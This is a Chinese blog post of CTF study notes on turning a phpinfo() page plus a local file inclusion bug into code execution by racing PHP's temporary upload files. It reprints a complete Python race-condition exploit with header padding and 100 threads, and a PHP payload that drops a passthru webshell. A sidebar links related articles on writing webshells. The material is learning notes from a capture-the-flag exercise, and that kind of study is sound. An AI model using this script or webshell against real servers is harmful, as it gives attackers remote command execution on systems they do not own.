web服务器的临时文件夹,WEB-基于phpinfo的包含临时文件

最新推荐文章于 2024-05-18 14:35:33 发布
最新推荐文章于 2024-05-18 14:35:33 发布
阅读量1k 收藏 2
点赞数
文章标签: web服务器的临时文件夹

— 从零开始的笔记 —

— phpinfo+LFI —

基于phpinfo的包含临时文件

从N1CTF ezphp 的非预期解中知道的漏洞

开始找资料学习

利用前提LFI文件包含漏洞

一个服务端的phpinfo页面

原理

先了解文件上传流程

02b50c42d8d666bb1017bf8bf33d8c58.png

向服务器上任意php文件以multipart/form-data方式提交请求上传数据时,会生成临时文件,也就是说不需要一定有显性的上传功能也可以上传生成临时文件。

下面向我们有的phpinfo页面以multipart/form-data方式提交文件

8a59edfb837d078b97c30948fe05f491.png

要注意的是 在multipart/form-data方式中,作为分割用的boundary字符串比定义处前面多两个--

查看结果,会有在通常GET请求中没看见的参数$_FILES

0c0edbe9b5bba4f14448334f9731bdac.png

phpinfo中的 upload_tmp_dir 可以查看临时文件存放的文件夹,但是文件名是随机的,所以不能利用

如果 php.ini 没有设置 upload_tmp_dir,那么默认 php 进程会读写系统的临时目录

(Windows 默认为 C:/windows/temp,Linux 为 /tmp)

另外$_FILES 是在运行中作为环境参数产生的,所以在我们平常中访问的phpinfo()不会包含$_FILES

接下来通过phpinfo中的$_FILES来获取临时文件的路径以及名称

假如上传的临时文件是木马文件,在被删除之前的极短时间之内,需要与服务器竞争时间包含木马文件,当然包含木马文件得到webshell不太现实,可以让木马文件重新生成一个shell文件或者提供一个反弹shell。

脚本竞争包含上传的木马文件

根据以下原理,来构建脚本

通过分块传输编码,提前获知临时文件名称;

分块传输可以实现在未完全传输完成时即可获知临时文件名,可以尽早发起文件包含请求,赶在删除之前执行代码。

通过增加临时文件名后数据长度来延长时间;

通过观察PHPinfo的信息,在$_FILES信息下面,还有请求头的相关信息,我们可以在请求的时候,通过填充大量无用数据,来增加后面数据的长度,从而增加脚本的处理时间,为包含文件争取更多的时间。

通过大量请求来延迟PHP脚本的执行速度。

通过大量的并发请求,提高成功的概率。

本机虚拟机测试,无限失败,原因不明

自己写的脚本与他人成功的脚本都尝试过,无果,可能跟虚拟机环境有关系

贴出他人成功的脚本

PS.写脚本时,发现python多线程时,不好在线程外读文件,在多个线程内使用这个文件,没有找到官方解释,可能是内存变动的原因

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68## PHP : Winning the race condition vs Temporary File Upload - PHPInfo() exploit

# Alternative way to easy_php @ N1CTF2018, solved by intrd & shrimpgo - p4f team

# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/

## shell.txt payload content

# <?php $c=fopen('shell.php','w');fwrite($c,'<?php passthru($_GET["f"]);?>');?>

import sys,Queue,threading,hashlib,os, requests, pickle, os.path, re

from subprocess import Popen, PIPE, STDOUT

NumOfThreads=100

queue = Queue.Queue()

class checkHash(threading.Thread):

def __init__(self,queue):

threading.Thread.__init__(self)

self.queue=queue

def run(self):

i=0

while True:

self.clear=self.queue.get()

passtry = self.clear

if passtry != "":

padding="A" * 8000

cookies = {

'PHPSESSID': 'o99quh47clk8br394298tkv5o0',

'othercookie': padding

}

headers = {

'User-Agent': padding,

'Pragma': padding,

'Accept': padding,

'Accept-Language': padding,

'DNT': '1'

}

files = {'arquivo': open('shell.txt','rb')}

reqs='http://192.168.1.23/phpinfo.php?a='+padding

#reqs='http://172.17.0.2:80/index.php?action=../../var/www/phpinfo/index.php&a='+padding

response = requests.post(reqs, headers=headers, cookies=cookies, files=files, verify=False)

data = response.content

data = re.search(r"(?<=tmp_name] => ).*", data).group(0)

print data

reqs = 'http://192.168.1.23/lfi.php?action=../..'+data

#reqs = 'http://172.17.0.2:80/index.php?action=../..'+data

print reqs

response = requests.get(reqs, verify=False)

data = response.content

print data

i+=1

self.queue.task_done()

for i in range(NumOfThreads):

t=checkHash(queue)

t.setDaemon(True)

t.start()

for x in range(0, 9999):

x=str(x)

queue.put(x.strip())

queue.join()

小林家的珂女仆
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php设置 uploadtmpdir_关于PHP上传文件时配置 php.ini 中的 upload_tmp_dir
weixin_39542608的博客
12-21 1026
在《PHP 5.3 入门经典》9.6.3 的试一试中(P235),给出了一个上传文件的例子,这里的文件格式为jpeg图片(image/jpeg)。如果之前未配置 php.ini 中的 upload_tmp_dir 参数,则会出现上传失败的提示信息。看如下代码片段if(isset($_FILES["photo"])) and $_FILES["photo"]["error"] == UPLOAD_E...
定时删除一个月前web服务器上的垃圾文件(临时文件)使用 java 1.7 Files 进行操作
li_tiantian的博客
12-29 1223
  ​ import java.io.File; import java.io.IOException; import java.nio.file.DirectoryStream; import java.nio.file.FileVisitResult; import java.nio.file.Files; import java.nio.file.NoSuchFileException;...
写入一句话木马姿势
weixin_48266255的博客
08-16 636
php写入一句话木马总结
如何在phpinfo()打开的PHP version页面进行关键词检索
最新发布
emmmaha的博客
05-18 262
通过这种方法,你可以在 PHP info 页面中方便地进行关键词检索,查找到你需要的信息。请注意,PHP info 页面包含了大量的配置信息,在查找时可以更快捷地定位到感兴趣的部分。来生成包含 PHP 配置信息的页面,然后通过浏览器的查找功能来搜索关键词。),在弹出的搜索框中输入你要查找的关键词,然后浏览器会帮助你找到匹配的关键词在页面中的位置。要在PHP version页面中进行关键词检索,可以使用 PHP 的内置函数。在页面中使用浏览器的查找功能(通常是按下 Ctrl + F。(用你实际的域名替换。
phpinfo包含临时文件Getshell全过程及源码
记录学习,一起进步
03-04 2762
phpinfo包含临时文件Getshell全过程及源码
php.ini中的upload_tmp_dir 参数
weixin_38920945的博客
08-10 607
php.ini 中的 upload_tmp_dir 参数php.ini 中的upload_tmp_dir 的这个参数为上传文件的临时目录,需要 php 进程有读写权限。如何设置呢?1. 查看 php 进程调用的 php.ini,一般调用 php 内置函数 phpinfo() 函数查看,方法很多:新建文件 1.php,写入 <?php phpinfo(); ?> ...
PHP-SSH2-Web-Client:PHP Web Client通过SSH连接到另一台服务器| https上的新项目
05-05
您需要激活服务器上安装的libssh2并将其托管在Linux服务器上,可以在使用“ phpinfo()”检查libssh2。安装安装libssh2。 如果您有plesk,则可以遵循此手册 使用“ npm install”安装xterm或在主目录中运行“ npm ...
Apache web 服务器 部署
04-23
在本文档中,我们将详细介绍 Apache web 服务器的部署过程,包括安装 Apache 服务器PHP 服务器、MySQL 数据库和 Tomcat 服务器,并将它们整合起来。 一、安装 Apache 服务器 在安装 Apache 服务器之前,需要下载...
Ubuntu-10-04下搭建php网站运行环境linux服务器应用-电脑资料.doc
12-20
phpMyAdmin 是一个基于 Web 的 MySQL 管理工具,我们可以使用以下命令来安装 phpMyAdmin: ```bash sudo apt-get install phpmyadmin ``` 安装过程中,系统将提示您选择 Web 服务器,请不要选择任何选项,直接点击...
WIN7下配置PHPWEB开发环境[整理].pdf
10-12
PHP版本选择的是php-5.3.2-Win32-VC6-x86,这个版本适用于非IIS的Web服务器,如Apache。MySQL选用的是mysql-essential-5.1.45-win32,即MySQL Community Server 5.1.45。Apache版本则是httpd-2.2.15-win32-x86-...
通过PHP自带的服务器来查看正则匹配结果的方法
01-20
首先,进入自定义的web文件夹,然后启动内置web服务器: cd ~/public_html php -S localhost:8000 端口号8000是自定义的,换成其他未使用端口均可。 启动后,控制界面如下所示: 测试内置服务器 在public_html...
Apache2中的web浏览器不能显示phpinfo信息
Dream Fly的专栏
12-02 1161
  最近想在Linux系统上安装禅道,但是一键安装的Ubuntu和CentOS包都不适合我这个系统(ARM64位的),于是只能通过禅道的源码安装,其中涉及到要装apache2和php7,其中有遇到一个坑是安装对应的apache和php相关组件后,发现web上访问,都是直接明文出来,而并不是显示出对应php的版本信息: <?php phpinfo(); ?> 原创文章,欢迎转载,转...
php文件包含phpinfo怎么输出,文件包含之通过phpinfo去Getshell
weixin_42517137的博客
03-27 1099
1.phpinfo信息利用phpinfo文件泄露一直被大家所忽视,但其实phpinfo可以为攻击渗透测试人员提供很多的信息。1.system 提供服务器所在的操作系统的信息。2.真实ip 知道真实ip的我们可以省去cdn带来的各种困扰。我们同时也可以端口旁站一顿操作。3.web根目录 网站绝对路径对渗透测试相当的有用,当你找到SQL注入点时,要上传木马的时候就需要知道网站的绝对路径才可以获取web...
[LFI]Phpinfo本地文件包含漏洞环境搭建分析
weixin_34380948的博客
08-29 470
0x00 本地文件包含漏洞即网站未对用户可控变量进行控制,导致用户可以控制包含变量。 0x01 参考wooyun上的教程中遇到问题如下: Can not connect to the docker deamon 权限不够,docker未提示,指令前加sudo sudo docker run –rm -p “8901:80” janes/lfi_phpinfo 8901为本机端口...
php本地文件包含&远程文件包含
think_ycx的专栏
04-07 7728
本地文件包含&远程文件包含
服务器临时路径生成文件,7天后删除
luo_yu_1106的博客
06-20 1121
这次项目是调用外部接口,推送数据。其中一个接口是csv文件批量传数据。也就是我们这边获取到List<实体>数据,然后转为csv文件,传送到接口里。生成csv文件就涉及到要向服务器写入文件。问了一下,建议用临时路径写文件。还有生成的文件不要在调用成功后立马删除,建议7天后删除。 所以就在项目上线前2个小时开始了改代码。 删除文件的思路是:先找到路径下所有7天前的文件,然后删除。 这...
配置临时文件存储路径、历史服务器、日志的聚集
Da.的博客
05-05 1314
配置临时文件存储路径 1) 停止进程sbin/yarn-daemon.sh stop nodemanager sbin/yarn-daemon.sh stop resourcemanager sbin/hadoop-daemon.sh stop datanode sbin/hadoop-daemon.sh stop namenode2) 修改 hadoop.tmp.dir [core-site.
清理文件服务器临时文件
weixin_33851429的博客
06-06 147
最近,文件服务器经常遇到磁盘空间不足的情况,通过运行dir /a/s >>dir.txt导出数据,再使用EXCEL分析文件类型和大小,找出原因是由于用户没有安全意识,随意将自己的个人文件放在公共盘上,又没有及时清理,最终导致磁盘空间不足。 首先是将带有大量与工作无关的视频和音频的文件夹直接移走,这样暂时就释放一部分磁盘空间,但这种情况维持不了多久,“治标不...
1、在linux系统上搭建FTP服务器。建议vsFTP • 2、在linux系统上搭建web服务器(搭建一个wordpress,或nginx做一个流媒体服务器,或用你熟悉开发环境搭建一个生产环境)
04-29
2. 在Linux系统上搭建web服务器: - 搭建WordPress - 安装Apache服务器,执行以下命令: ``` sudo apt-get update sudo apt-get install apache2 ``` - 安装MySQL数据库,执行以下命令: ``` sudo apt-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值